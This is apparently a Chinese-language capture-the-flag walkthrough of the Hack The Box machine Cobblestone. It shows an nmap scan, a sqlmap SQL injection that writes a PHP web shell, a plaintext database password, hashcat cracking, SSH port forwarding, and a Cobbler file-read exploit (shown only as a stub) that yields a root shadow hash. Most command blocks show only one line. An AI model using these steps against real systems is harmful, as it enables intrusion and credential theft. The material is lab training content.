基本信息
- https://app.hackthebox.com/machines/Cobblestone
- 10.10.11.81
端口扫描
22和80:
1 | nmap -sC -sV -Pn 10.10.11.81 |
80
需要加hosts:
1 | 10.10.11.81 cobblestone.htb |
游戏相关,选项链接到deploy和vote两个子域名:
vote
随意注册登录,测试功能
sql注入 to shell
Suggest功能注入,并且有文件读写权限:
1 | sqlmap -r sql2.txt -v 3 --level 3 --privilege |
所以直接写shell:
1 | sqlmap -r sql2.txt -v 3 --level 3 --file-write shell.php --file-dest /var/www/vote/shell.php |
revshell
获取revshell更方便后续:
mysql
常规翻文件得到连接信息:
1 | www-data@cobblestone:/var/www/vote/db$ cat connection.php |
然后数据库里获取到hash:
1 | mysql -u dbuser -p'aichooDeeYanaekungei9rogi0eMuo2o' |
常规破解出cobble密码:
1 | sudo hashcat -m 1400 hash.txt ~/Tools/dict/rockyou.txt |
user flag
得到的密码ssh登录cobble,是在受限rbash里:
Cobbler to root
本地运行25151端口,搜索以及根据机器名可以知道这是Cobbler:
搜索可以找到:
- [EN] Cobbler <= 3.2.1 multiple vulnerabilities leading to RCE as root - TNP IT Security
https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/
root flag
转发端口,利用任意文件读获取root.txt:
1 | ssh cobble@10.10.11.81 -L 25151:127.0.0.1:25151 |
exp.py
1 | import xmlrpc.client |
shadow
1 | root:$y$j9T$GkvDOmNntXI/Ewjpng7nM.$0J4ZYo3xXXfM7SfPKZ67Y.wY./PmrX7/bXDywzXSPr2:19993:0:99999:7::: |
预期方式
直接看ippsec视频
- HackTheBox - Cobblestone - YouTube
https://www.youtube.com/watch?v=zLCxUiQcHC0
参考资料
- [EN] Cobbler <= 3.2.1 multiple vulnerabilities leading to RCE as root - TNP IT Security
https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/ - HackTheBox - Cobblestone - YouTube
https://www.youtube.com/watch?v=zLCxUiQcHC0